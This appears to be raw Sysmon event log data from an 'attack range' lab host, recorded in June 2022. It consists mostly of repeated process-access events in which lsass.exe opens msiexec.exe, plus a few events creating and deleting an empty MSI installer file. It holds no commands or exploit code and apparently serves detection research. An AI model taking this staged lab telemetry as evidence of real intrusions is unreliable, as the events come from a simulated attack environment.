15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002694126Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002694125Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5144.msi2022-06-17 15:05:09.694NT AUTHORITY\SYSTEM 23542300x80000000000000002694124Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5144.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002694123Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5144.msi2022-06-17 15:05:09.694NT AUTHORITY\SYSTEM 10341000x80000000000000002694121Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694120Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694119Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694118Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694117Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694116Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694115Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694113Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694112Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694110Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694108Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694107Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694104Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694103Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694102Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 